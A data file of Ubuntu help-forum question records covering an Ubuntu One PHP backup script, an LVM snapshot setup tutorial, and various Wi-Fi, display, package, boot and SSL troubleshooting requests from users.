424224	problems with ubuntu one api and php	i have a php script that backups my servers and send the files to ubuntu one . it was working fine until yesterday , but it 's not working anymore . i found out there was a problem with the authorization , so i fixed it - i think there was an update in the api . but there seems to be a problem with sending the file to ubuntu one . the complete code is in https : //github.com/oscardias/u1backup/blob/master/u1backup.php , but here are the most relevant sections . authorization ( updated today , seems to be working fine ) : $ fields = array ( 'email ' = > $ this- > email , 'password ' = > $ this- > pass , 'token_name ' = > 'ubuntu one @ '.gethostname ( ) . ' [ u1backup ] ' ) ; // url-ify the data for the post $ fields_string = json_encode ( $ fields ) ; $ url = 'https : //login.ubuntu.com/api/v2/tokens/oauth ' ; $ curl = curl_init ( $ url ) ; curl_setopt ( $ curl , curlopt_customrequest , `` post '' ) ; curl_setopt ( $ curl , curlopt_returntransfer , true ) ; curl_setopt ( $ curl , curlopt_postfields , $ fields_string ) ; curl_setopt ( $ curl , curlopt_httpheader , array ( 'content-type : application/json ' , 'accept : application/json ' , 'content-length : ' . strlen ( $ fields_string ) ) ) ; $ data = curl_exec ( $ curl ) ; curl_close ( $ curl ) ; file_put_contents ( $ this- > local . 'u1backup ' , $ data ) ; return $ data ; it saves the information into a file called u1backup , just to speed things up next time . creating the oauth object : $ tokena = json_decode ( $ data , true ) ; // $ data is the return from authorization // set up the token for use in oauth requests $ conskey = $ tokena [ 'consumer_key ' ] ; $ conssec = $ tokena [ 'consumer_secret ' ] ; $ token = $ tokena [ 'token_key ' ] ; $ secret = $ tokena [ 'token_secret ' ] ; $ oauth = new oauth ( $ conskey , $ conssec , oauth_sig_method_hmacsha1 , oauth_auth_type_uri ) ; $ oauth- > enabledebug ( ) ; $ oauth- > enablesslchecks ( ) ; $ oauth- > settoken ( $ token , $ secret ) ; // tell ubuntu one about new token if ( $ sso_notice ) { $ tell_u1_about_token_url = 'https : //one.ubuntu.com/oauth/sso-finished-so-get-tokens/ ' . $ this- > email ; $ oauth- > fetch ( $ tell_u1_about_token_url ) ; } // we want to urlencode the path ( so that the space in `` ubuntu one '' , for example , // becomes % 20 ) , but not any slashes therein ( so the slashes do n't become % 2f ) . // urlencode ( ) encodes spaces as + so we need rawurlencode $ encpath = rawurlencode ( $ this- > remote ) ; $ encpath = str_replace ( `` % 2f '' , `` / '' , $ encpath ) ; // send files foreach ( $ this- > zip_files as $ file ) { $ this- > _sendfile ( $ oauth , $ file , $ encpath ) ; } and the method that sends the files : private function _sendfile ( $ oauth , $ file , $ encpath ) { $ contents = file_get_contents ( $ file ) ; $ put_file_url = 'https : //files.one.ubuntu.com/content ' . $ encpath . '/ ' . basename ( $ file ) ; $ oauth- > fetch ( $ put_file_url , $ contents , oauth_http_method_put , array ( 'content-type'= > 'application/json ' ) ) ; } i think that this last part is the one with problems . the path seems fine ( files.one.ubuntu.com/content/~/ubuntu % 20one/ ... ) . i 'm getting a 'uncaught exception 'oauthexception ' with message 'invalid auth/bad request ( got a 500 , expected http/1.1 20x or a redirect ) '' error . any help will be really appreciated . ps : i 've already looked at the following references : how to create a new file with content using ubuntu one api and php ubuntu one oauth login from php https : //github.com/wasare/ubuntuone-php-client-library/blob/master/u1_apis/u1_base.php
424225	setting up lvm snapshot as a backup/restore point in ubuntu	since i could not find how to post this as a blog/post/tutorial in askubuntu.. i decided on posting it here , were it is best exposed anyhow ... setting up lvm snapshot as a backup/restore point in ubuntu . why ? well , as i see it , with all the great usefulness of linux , its biggest drawback is with its mixed up way of installing apps . all the dlls go to one directory . all the configuration files to another . and the binaries are also put in a bunch . yes , windows works the same way more or less , but with the nature of system/server software installed on linux , being that most of the software installed is only about 95 % mature at any given time , messing up your system twice a month is very probable.. of course , we can backup the system before and after each installation , but that takes a million years . system backups ( as oppose to just data/files backup ) requires you to turn off you computer and use some form of bootable live cd and a backup media . and , if the drive is more than 15 % full , it might take a long time to do the backup , even with modern hardware . the alternative - lvm snapshots - you can read about lvm snapshots here : http : //www.tutonics.com/2012/12/lvm-guide-part-2-snapshots.html in short - snapshots are a way of freezing the used sectors on the harddisk , telling the system to write any change/delete/add on a reserved part of the harddisk , called a snapshot volume , thus postpone the decision of keeping/discarding the changes on the drive to some future time , as far as the snapshot volume space provides . and so , once you decide to rollback the changes ( or keep them ) , you can do it with one line . it may seem complex at first , but i can assure you that after the first time effort , all that is needed to use the snapshot mechanism is just 2 line scripts ( downloads provided ! ) warranty - no warranty what so ever is given for the instructions below . use at your own risk ! how ? if you do n't have a pre-configured volume group , you will probably need to install a fresh clean ubuntu . then , you will have to put some effort into configuring the system correctly for the first time , but from this point on , snapshot will become effortless . and by effortless i mean one liner commands , using pre-configured scripts . boot to the ubuntu live cd ( no installation yet.. just the live cd ) open accessories - > terminal we will be clearing the hard drive ! please backup anything important before going through this stage . first , let 's remove the existing partitions : # fdisk /dev/sda enter 'd ' to delete - enter for as many partitions you have > d > < enter > ... enter 'w ' to write down changes > w create the boot partition and the rest of the drive as the other partition # fdisk /dev/sda > n to create a new partition . > p for boot primary partition . > 1 press < enter > to accept the default start sector . enter : > +512m to give the boot partition a size of 512mb > n to create ( another ) new partition . > p should be primary too . > < enter > to accept the default value of 2 ( the second partition ) > < enter > to accept the default start sector > < enter > to accept the whole disk > t to change the type of the second partition to lvm > 2 to choose the second partition > 8e to set the type to 'lvm linux' > w to write changes and exit . to check that the changes worked well run : # fdisk -l you should get something like this : device boot start end blocks id system /dev/sda1 2048 524287 261120 83 linux /dev/sda2 524288 488397167 243936440 8e linux lvm remove any previous volume groups / logical volumes : # lvdisplay will display the logical volumes you may have on the system # lvremove < existing_logical_volume_name > if any volume install that may interfere with this installation need be removed . # vgdisplay will show any existing volume group on the system # vgremove < existing_volume_group > same as for the volume groups.. create the volume group 'vgsnap' # vgcreate vgsnap /dev/sda2 should result with : volume group `` vgsnap '' successfully created create the logical volume # lvcreate -l 100 % free -n lvroot vgsnap the root logical volume , starting with 100 % of device . # lvresize -l -30g /dev/mapper/vgsnap-lvroot this will take off 30g for swap & snapshot volumes . of course - you can choose smaller sizes for the swap/snapshot . > 'y' for the warning shown . and create the swap volume : # lvcreate -l 15g -n lvswap vgsnap note : we leave now 15g of unused drive space , reserved for the future snapshot . installing ubuntu close the terimnal and start the installer . choose `` use lvm ... '' ( you may also choose to enable whole disk encryption - but i did n't test it.. ) select `` something else '' and press continue . at this stage you will find allot of /dev/mapper/ ... volumes defined . some of these are auto generated ( lvsnap-* ) - you can ignore them for now . select : /dev/mapper/vgsnap-lvroot volume . choose `` ext4 '' as format , and mount as '/ ' select : /dev/mapper/vgsnap-lvswap volume , and choose `` swap area '' if you are to create an encrypted drive ( i have no clue if that would work with the snapshots ? ) , you will probably want to select the /dev/sda2 and mark the `` volume for encryption '' . did n't test it though.. note : the unused 15g are left free for the snapshot volume . select : /dev/sda1 partition . format it as 'ext2 ' and mount it as '/boot' below - choose : /dev/sda1 partition as boot install ! using the snapshot the following steps will show how to use the snapshot at any given time : mounting the snapshot : create the snapshot volume # lvcreate -l 15g -s -n lvsnap /dev/mapper/vgsnap-lvroot create the mount directory # mkdir /mnt/vgsnap-lvsnap mount the snapshot as read-only mount # mount -o ro /dev/vgsnap/lvsnap /mnt/vgsnap-lvsnap snapshot is on ! at this point you may start messing up your system , installing beta drivers , and even ( no ! that 's just inappropriate ) . from now on you may at any time ( as far as the snapshot size provides.. ) return to previous state , or , if satisfied with the new look - keep it . automatic snapshot volume free disk space monitoring : using a tweaked version of the script provided here : http : //blog.rimuhosting.com/2012/02/20/cron-script-for-checking-disk-space/ i created monitor_snapshot script ( see link at the end of document ) how to use/install it ? - pretty much as with the link above : # cd /etc/cron.hourly # copy /home/ < user > /downloads/monitor_snapshot # chmod +x monitor_snapshot before running it for the first time you better edit the values in it , such as your email address ( where the notifications are to be sent , etc.. ) if properly configured , the cron daemon will run the script every x hours/days - as you decide - and notify you once the snapshot is about to be full . to test the script run : # sh /etc/cron.hourly/monitor_snapshot it will print the percentage ( number ) of free space in the snapshot . important ! once you 're done with your tests/installations - rollback or keep changes - and umount the snapshot ! rolling back changes : ( see rollback_snapshot script , with the following instructions in it , link at the end of document ) # lvconvert -- merge /dev/vgsnap/lvsnap this will also umount the snapshot , but will discard any of your changes . also - you will see a warning that suggest that the revert will only occur next activation , so : # reboot note : if you skip merging in , your changes shall be committed once you umount the snapshot . committing changes - umounting the snapshot : ( see commit_snapshot script , with the following instructions in it - link at the end of document ) # umount /mnt/vgsnap-lvsnap will unmount ( commit0 the snapshot # lvremove /dev/mapper/vgsnap-lvsnap # rm -rf /mnt/vgsnap-lvsnap/ # rm /etc/cron.hourly/monitor_snapshot remove the cron daemon script ( that is unused ) re-mounting the snapshot : ( see remount script , with the following instructions in it - link at the end of document ) pretty much as before : # lvcreate -l 15g -s -n lvsnap /dev/mapper/vgsnap-lvroot # mkdir /mnt/vgsnap-lvsnap # mount -o ro /dev/vgsnap/lvsnap /mnt/vgsnap-lvsnap if you saved the monitor_snapshot at your home dir you can restore it back : # cp /home/ < user > /monitor_snapshot /etc/cron.hourly/ # chmod +x /etc/cron.hourly/monitor_snapshot that 's all folks ! following instructions are for quitters only ; ) discarding the snapshot volume ( if no longer required ) # rmdir /mnt/vgsnap-lvsnap # lvremove /dev/vgsnap/lvsnap ( you might also want to resize the root partition or swap to occupy the missing 15g reserved for swap ) discarding the volume group - possible only by removing the volume group 's volumes , which probably means deleting the os installation . but of course , there 's no real need to remove the volume group ... to remove the volume group : # vgremove vgsnap important note ! - formatting / running fdisk and removing all partitions will not remove the volumes nor the group , as these are written on a different part of the drive ... so , just use the remove instructions given above and remove the volumes and group if required .
424226	network not working after installing updates	last night i installed some updates on my ubuntu 12.04 , namely these which , in my opinion , might be responsible : libqt4-network libproxy1-plugin-networkmanager after rebooting the wireless is n't working . `` enable networking '' is ticked . the command lshw gives me the information *-network unclaimed , does that mean that somehow i 'm missing the driver now ?
424233	hdmi connection disappeared	i 'm using a toshiba laptop running ubuntu 12.04 on an intel graphics controller , connected to a philips monitor through hdmi . one fine day , the connection ( let alone the monitor ) via hdmi simply disappeared . i actually had the very same issue before , which was resolved with an update ( just like this guy 's how to detect and configure an output with xrandr ? ) . that day , i recorded the updates that i ran , but it does n't seem like there are any graphics updates . it seems that this is a systemic issue , so i would like to resolve it once and for all . thanks a lot in advance ! let me know if you need more details . i tried : reboot sudo apt-get upgrade & & sudo apt-get update reconnect output from xrandr : $ xrandr screen 0 : minimum 320 x 200 , current 3286 x 1080 , maximum 8192 x 8192 lvds1 connected 1366x768+0+312 ( normal left inverted right x axis y axis ) 0mm x 0mm 1366x768 60.2*+ 1360x768 59.8 60.0 1024x768 60.0 800x600 60.3 56.2 640x480 59.9 vga1 connected 1920x1080+1366+0 ( normal left inverted right x axis y axis ) 476mm x 268mm 1920x1080 60.0*+ 1680x1050 60.0 1280x1024 75.0 60.0 1440x900 75.0 59.9 1280x720 60.0 1024x768 75.1 60.0 800x600 75.0 60.3 640x480 72.8 75.0 66.7 60.0 720x400 70.1 output from lspci : $ lspci -v 00:02.0 vga compatible controller : intel corporation 3rd gen core processor graphics controller ( rev 09 ) ( prog-if 00 [ vga controller ] ) subsystem : toshiba america info systems device 0004 flags : bus master , fast devsel , latency 0 , irq 45 memory at e0000000 ( 64-bit , non-prefetchable ) [ size=4m ] memory at d0000000 ( 64-bit , prefetchable ) [ size=256m ] i/o ports at 2000 [ size=64 ] expansion rom at < unassigned > [ disabled ] capabilities : < access denied > kernel driver in use : i915 kernel modules : i915
424234	wifi driving me crazy ! ubuntu 12.04 on macbook pro 9,2 ( mid-2012 )	i 'm very new to ubuntu but familiar in general with linux . i ca n't seem to get my wifi issue sorted out . my first order of business was getting my driver to work which seemed to take more time than necessary . after finally getting it to install , through google trial and error , it wo n't stay working and the driver says the it is activated but not in use ! my wifi turns on after using the command : iwconfig the wifi works until i disable wireless or the computer goes to sleep/restarts . i found that i can also trick the wifi into working by searching for my network every time as a `` hidden network '' . other than this i 'm at a complete loss and would really like to get this situation sorted out . please help !
424236	when i run this script appear this msg	$ sudo sh mininetscript30923.sh mininetscript30923.sh : 5 : mininetscript30923.sh : script created by vnd - visual network description ( sdn version ) : not found from : ca n't read /var/mail/mininet.net from : ca n't read /var/mail/mininet.node from : ca n't read /var/mail/mininet.cli from : ca n't read /var/mail/mininet.log from : ca n't read /var/mail/mininet.link mininetscript30923.sh : 12 : mininetscript30923.sh : syntax error : `` ( `` unexpected
424237	who / w / logname broken in multiple terminals	i have a strange problem : in a gui session , depending on the terminal being used the following two ( related ) problems appear : who and w does n't list the user 's active session logname returns logname : no login name it happens in the following terminals : lxterminal xfce4-terminal rxvt on the other hand , in the following scenarios it works perfectly ( who/w lists the user and logname functions ) : ssh-ing in xterm / lxterm / uxterm
424239	can not install vlc media player	some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies . vlc : depends : vlc-nox ( = 2.0.8-0ubuntu0.12.04.1 ) but it is not going to be installed depends : libavcodec53 ( > = 4:0.8-1~ ) but it is not going to be installed or libavcodec-extra-53 ( > = 4:0.8-1~ ) but it is not going to be installed depends : libsdl-image1.2 ( > = 1.2.10 ) but it is not installable depends : libtar0 but it is not installable depends : libva-x11-1 ( > 1.0.15~ ) but it is not installable depends : libva1 ( > 1.0.15~ ) but it is not installable depends : libxcb-keysyms1 ( > = 0.3.8 ) but it is not installable recommends : vlc-plugin-notify ( = 2.0.8-0ubuntu0.12.04.1 ) but it is not going to be installed recommends : vlc-plugin-pulse ( = 2.0.8-0ubuntu0.12.04.1 ) but it is not going to be installed e : unable to correct problems , you have held broken packages .
424240	network speed drop when not charging	i can surf the web when i am charging my laptop , but when i pull my charger out to run on battery power , it looks like the internet speed drop to 0kb/s . i tried to turn acpi=off in grub.cfg this caused some unwanted effects ( so i changed it back to normal ) . when i did this my internet worked fine while charging and on battery power , but i lost my battery applet from the desktop panel . now i have the same problem - no internet on battery ... can anyone help me with this ?
424242	how do i control compression level for ipod rhythmbox	where do i control the compression level and format for songs being re-compressed for storage on my ipod from rhythmbox ?
424244	how to remove package manually ?	i customized a liveusb of ubuntu , but one package ( squid ) did not install cleanly so i unsuccessfully tried to uninstall . but everytime i boot up i get a crash warning with the message sorry the package `` squid3 3.1.16-1ubuntu1~ppa1~lucid1 '' failed to install or upgrade what triggers this upgrade attempt and how can i just delete those files manually
424245	can not add ppa for gvfs-mtp	i am a total newbie concerning anything to do with ubuntu/linux . i am running 12.04 on vm player . i am trying to connect my htc one ( android 4.3 ) to ubuntu , and looking online has told me to do : sudo add-apt-repository ppa : langdelepl/gvfs-mtp which will ( through some magics that i have yet to understand ) , allow me to properly mount my phone as a usb device . but i keep getting : can not access ppa ( https : //launchpad.net/api/1.0/~langdelepl/+archive/gvfs-mtp ) to get ppa information , please check your internet connection . i 've checked my internet connection , and even gone to the url , where it shows : object : < lp.systemhomes.webserviceapplication object at 0x9026d90 > , name : u'~langdelepl' so there is definitely something there . i even tried doing the very involved version where you add the source through the software center , but it still did n't work . i 've accessed a couple other ppa repositories through the terminal , so it just appears to be this one . what the heck is causing the problem ? why do i need mtp ? is there any method other than mtp that would mount my phone ( preferably without being too involved . keep in mind that i am an utter linux newbie : p ) any and all help is greatly appreciated ! ! ! ! ps . i have made sure about 5 times now that the phone is connected to the vm via the removable devices menu . so it likely is n't that .
424253	how to recover data & partition lost during installation of ubuntu12.04lts . please help .i have lost my work place data.urgent	i had windows 7 installed on a 500gb hard drive . i wanted to install ubuntu on a16gb pendrive and use it as a hard drive . i made an ubuntu bootable pendrive on a 4gb pendrive . then i booted my system from the ubuntu 4gb pendrive . i inserted a 16gb pendrive to install ubuntu on it . i choose the `` something else '' option while installing ubuntu . during the partition allocation and that process i deleted my 500gb hard drive ( i.e . /sda ) instead of selecting my 16gb pendrive . i came to know about this mistake when i tried to restart my system . it showed this message : insert bootable disk . once again i booted my laptop with the 4gb ubuntu bootable pendrive . in disk utility i saw that my 500gb hard drive has free space . i have very important data on it . please help me . it 's very urgent .
424254	maintenance password	i just downloaded ubuntu 13.10 onto an older xps 420 dell 32 bit . i did the single boot . when it downloaded , for some reason it kept the original user name as well as the computer name . now i ca n't get into the admin account . i have seen other posts here that explain how to get to the root menu which does n't work . i can get there but instead i get the root @ ubuntu : . it wants me to enter a maintenance password or hit ctrl+d . second : would it be easier to start over and install ubuntu again and how would i do that ?
424257	how to solve a `` error grub rescue : no such partition '' error ?	i 'm an ubuntu user and i 've installed win xp and ubuntu on my 32-bit acer aspire one . i 've once restarted and i get this error : no such partition entering rescue mode ... grub rescue > please help , ls gives ( hd0 ) ( hd0 , msdos5 ) ( hd0 , msdos3 ) ( hd0 , msdos2 ) ( hd0 , msdos1 ) .
424261	how do i see the last popup ?	while i was typing a message there was a popup , which i did n't get to see . i did n't get to see it because it stole focus and thus took my key presses as commands . ( i.e . when i hit space to write a new word it thought i can hitting `` ok '' or `` cancel '' or whatever the default was ) . this happened so fast that i did n't get to see what it was . maybe it was a system update ? i 'm using ubuntu 13.04 desktop . is it possible to see the last system messages/events ? is it possible to change this behaviour ? ( e.g . stop it from stealing focus ) any ideas as to what did might have been ?
424263	wirless ap-hotspot ubuntu 13.10	i have ubuntu 13.10 and i created a wireless hot spot using the network setting option and also tried to setup using ap-hotspot . the problem is the one setup using network setting is not showing in my phone ( android 4.0 ) and when i start ap-hotspot it says already a process is running and if i stop and try to start again it says another process already running again .
424268	ssl and localhost issue	hi i am new in linux and ubuntu ( 13.10 ) and have reached stop point of my configuration . the configuration of my server is apache2 with sslv3 , tlsv1 only on 443 ( iptables prerouting 80 to 443 ) and `` sethandler server-status '' enabled ( /lcloud.dev.local/example-status , lcloud.dev.local = localhost ) in apache2.conf with selfsigned certificate ( openssl ) . when i try to connect to https : //lcloud.dev.local/example-status ? auto with wget or curl ( with -- no-check-certificate option ) i get error : '' error:140770fc : ssl routines : ssl23_get_server_hello : unknown protocol '' , but if i try to open the url from other comp in same network i have got right answer ( with statistics ) . i get the same error even if i stop the iptables . the trace from the curl is : '' = info : adding handle : conn : 0x20e6a50 == info : adding handle : send : 0 == info : adding handle : recv : 0 == info : curl_addhandletopipeline : length : 1 == info : - conn 0 ( 0x20e6a50 ) send_pipe : 1 , recv_pipe : 0 == info : about to connect ( ) to lcloud.dev.local port 443 ( # 0 ) == info : trying 127.0.1.1 ... == info : connected to lcloud.dev.local ( 127.0.1.1 ) port 443 ( # 0 ) == info : successfully set certificate verify locations : == info : cafile : none capath : /etc/ssl/certs == info : sslv3 , tls handshake , client hello ( 1 ) : = > send ssl data , 241 bytes ( 0xf1 ) 0000 : 01 00 00 ed 03 01 53 06 ec d9 06 8c bc 7e fd 59 ... ... s ... ... ~.y 0010 : e9 b6 e9 bf 97 06 ab 7a ea 0f 96 78 ed 9d 37 dd ... ... .z ... x..7 . 0020 : 14 4d f9 ad e4 15 00 00 66 c0 14 c0 0a c0 22 c0 .m ... ... f ... .. '' . 0030 : 21 00 39 00 38 00 88 00 87 c0 0f c0 05 00 35 00 ! .9.8 ... ... ... 5 . 0040 : 84 c0 12 c0 08 c0 1c c0 1b 00 16 00 13 c0 0d c0 ... ... ... ... ... . 0050 : 03 00 0a c0 13 c0 09 c0 1f c0 1e 00 33 00 32 00 ... ... ... ... 3.2 . 0060 : 9a 00 99 00 45 00 44 c0 0e c0 04 00 2f 00 96 00 ... .e.d ... ../ ... 0070 : 41 c0 11 c0 07 c0 0c c0 02 00 05 00 04 00 15 00 a ... ... ... ... ... 0080 : 12 00 09 00 14 00 11 00 08 00 06 00 03 00 ff 01 ... ... ... ... ... . 0090 : 00 00 5e 00 00 00 15 00 13 00 00 10 4c 43 6c 6f ..^ ... ... ... lclo 00a0 : 75 64 2e 64 65 76 2e 6c 6f 63 61 6c 00 0b 00 04 ud.dev.local ... . 00b0 : 03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19 ... ... .4.2 ... ... 00c0 : 00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08 ... ... ... ... ... . 00d0 : 00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13 ... ... ... ... ... . 00e0 : 00 01 00 02 00 03 00 0f 00 10 00 11 00 0f 00 01 ... ... ... ... ... . 00f0 : 01 . == info : sslv3 , tls alert , server hello ( 2 ) : = > send ssl data , 2 bytes ( 0x2 ) 0000 : 02 46 .f == info : error:1408f10b : ssl routines : ssl3_get_record : wrong version number == info : closing connection 0 '' i appreciate if someone can help with this issue .
424269	best version of ubuntu for my laptop	i 'm looking for the best version of ubuntu to install , which will be compatible with the hardware of my samsung rf511-s01 laptop : i3-2310m processor , 2.1 ghz memory 4gb/hard disk 500 gb graphics card 1 of 2 : intel hd graphics 3000 graphics card 2 of 2 : nvidia geforce gt 540m-1024 mb , ddr3
424270	shell asks me to install idle despite it being already installed	i executed this command to open a .py file in idle terminal : idle python_file.py shell displayed the following message in response : the program 'idle ' is currently not installed . you can install it by typing : sudo apt-get install idle i have already installed idle and infact used the same to create python_file.py . why does shell ask me to install it again ? using ubuntu 13.10 if it helps .
424272	ubuntu 13.10 goes black screen after uncompleted software updates	i usually get this alert each time i start my ubuntu that i should perform software update , i usually ignore it . but yesterday i just decided to perform the update which could n't complete because my internet connection got so slow and disconnected . since then just after i shutdown my system its being showing some black screen just after the ubuntu logo is done loading . i even inserted the ubuntu disc and tried to run from cd but just after the ubuntu logo is done loading i get a black screen .
424273	ncurses reports ~ instead of numpad_home with gnome-terminal	i 've written a small program that makes use of ncurses . when i run this program in gnome-terminal ( u13.10 ) on my laptop ( asus m70sa ) , ncurses reports the ~ key ( 126 ) when i press numpad home ( numpad end also returns ~ ) , but the arrow keys and page up/down work fine . when i run my program in xterm , everything works as i expected . this leads me to believe that there is something in gnome-terminal 's terminfo database that is causing this behaviour . i thought i might be able to use gconf-editor to tweak this but it seems to only allow me to create short-cuts for keybindings . whilst trying to figure out how to overcome this problem , i found on the linux documentation project site a very short program that displays keycodes for pressed keys : void main ( void ) { int c ; while ( c = getchar ( ) ) printf ( `` % d 0x % 02x\n '' , c , c ) ; } when i run it in gnome-terminal , thehome and page-up keys return : home = > ^ [ [ 1~ = > 27 91 49 126 10 ( fails ) page-up = > ^ [ [ 5~ = > 27 91 53 126 10 ( works ) when i run it xterm , they return : home = > ^ [ [ h = > 27 91 72 10 ( works ) page-up = > ^ [ [ 5~ = > 27 91 53 126 10 ( works ) page-up is consistent , but home is not . i tried running xev in both terminals , and it gives consistent results though the codes are different to those which ncurses returns . i 'm wondering if anyone knows how to fix this ? either through processing getch ( ) in a particular way ( maybe post a link to some good documentation ) , or by modifying gnome-terminal 's terminfo data . i do n't mind coding my program to respond to two different variations ( as my users might have their own preference for which terminal program they like ) . cheers , nap i 've been using a short sample program paul griffiths wrote in my attempts to debug what is going on . his program is available at : http : //www.paulgriffiths.net/program/c/srcs/curin1src.html
424275	belkin f5d7050 wireless adapter no internet	first off , full disclosure : i 'm a complete novice . i 've tried to find an existing answer that i can work from , but i 'm just lost . i moved the pc to sit 2 metres from the wireless router to eliminate a weak signal as an issue , and still nothing . the pc is usually in another room , so internet access via usb wifi only . this worked fine when the pcs os was windows 7 . in summary : i can see and connect to to my home network via wifi ( entered password ) , however on mozilla impossible to load any internet pages , or even connect to my router via 192.168.1.1. lsusb identifies the usb dongle as : belkin components f5d7050 wireless g adapter v1000/v2000 [ intersil isl3887 ] modinfo p54usb : user @ homepc : ~ $ modinfo p54usb filename : /lib/modules/3.11.0-15-generic/kernel/drivers/net/wireless/p54/p54usb.ko firmware : isl3887usb firmware : isl3886usb alias : prism54usb license : gpl description : prism54 usb wireless driver author : michael wu < flamingice @ sourmilk.net > srcversion : 7ff04f82d401e866095cf72 alias : usb : v413cp8104d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v413cp8102d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v413cp5513d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v2001p3705d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v2001p3704d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v1740p1000d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v1668p1050d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v1435p0427d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v1413p5400d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v13b1p000cd*dc*dsc*dp*ic*isc*ip*in* alias : usb : v13b1p000ad*dc*dsc*dp*ic*isc*ip*in* alias : usb : v1260pee22d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v124ap4025d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v0d8ep3762d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v0cdep0015d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v0cdep0008d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v0bf8p1009d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v0bafp0118d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v0915p2002d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v0915p2000d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v0846p4240d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v083apf503d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v083apc501d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v083ap4531d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v083ap4521d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v0803p4310d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v07aap0020d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v0707pee13d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v06b9p0121d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v06a9p000ed*dc*dsc*dp*ic*isc*ip*in* alias : usb : v0572p2002d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v0572p2000d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v050dp7050d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v0471p1230d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v5041p2235d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v5041p2234d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v2001p3762d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v2001p3703d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v2001p3701d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v1915p2235d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v1915p2234d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v182dp096bd*dc*dsc*dp*ic*isc*ip*in* alias : usb : v1630p0005d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v15a9p0002d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v1435p0210d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v124ap4023d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v107bp55f2d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v0db0p6826d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v0cdep0006d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v0bf8p1007d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v09aap1000d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v0846p4220d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v0846p4210d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v0846p4200d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v083ap5501d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v083ap4502d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v083ap4501d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v07aap001cd*dc*dsc*dp*ic*isc*ip*in* alias : usb : v0707pee06d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v06b9p0120d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v0675p0530d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v0506p0a11d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v045ep00c2d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v0411p0050d*dc*dsc*dp*ic*isc*ip*in* depends : p54common , mac80211 intree : y vermagic : 3.11.0-15-generic smp mod_unload modversions 686 can anybody help me find the problem ? thanks , -d
424279	how to connect ubuntu one on a proxy server connection	i have proxy connection in my hostel . which first needs to be logged into . while using ubuntu one it is not able to connect to internet . i tried attaching proxy to apps but i exactly dont know how to do it .
424283	ubuntu 13.10 win 7 dual boot problem	i am trying to dual boot ubuntu 13.10 and windows 7 on a 128gb ssd . win7x64 is installed and happy ( willing to wipe , would prefer not to ) ntfs partition was created using partitioning within windows can successfully boot into 13.10 from usb , but linux only sees an unallocated mass of storage , and does n't see the partitions i created . but when i demo linux off the thumbdrive , it can see two storage devices plugged in , but ca n't find an os on either , so it thinks the drive is unallocated . where do i go from here ? thanks in advance !
424285	installing netflix on ubuntu 12.04	i am trying to install netflix , when i issue the command : sudo apt-get install netflix-desktop i get a screen with microsoft eula . it does not complete nor can you break out with ctrl+c . any ideas ?
424289	installing ubuntu with windowsxp on separate paritions and it failed and lost all the data	it was the second time i failed to have ubuntu installed . i tried to install ubuntu12.4 on the separate partition of my hard disk , first by changing it into an ext4 file type from ntfs . unfortunately i made blunder by selecting the partition where i had put all my personal data , say , of the volume of 50gb approx.while booting with the live dvd , ( i usually download from ubuntu site and burn on a dvd/cd ) i personalized it first and then started the process of installation and there was a message reading like unmounting a drive or disc , oh yes , my pen-drive was also plugged in at that time . that last message was an error in installation and i had lost all my records.now i feel sorry and sad . i am an unskilled end user of computer . is there a way that i can recover my lost records. ? here in my city lucknow software experts or service providers specially dealing linux are rare . please guide me .
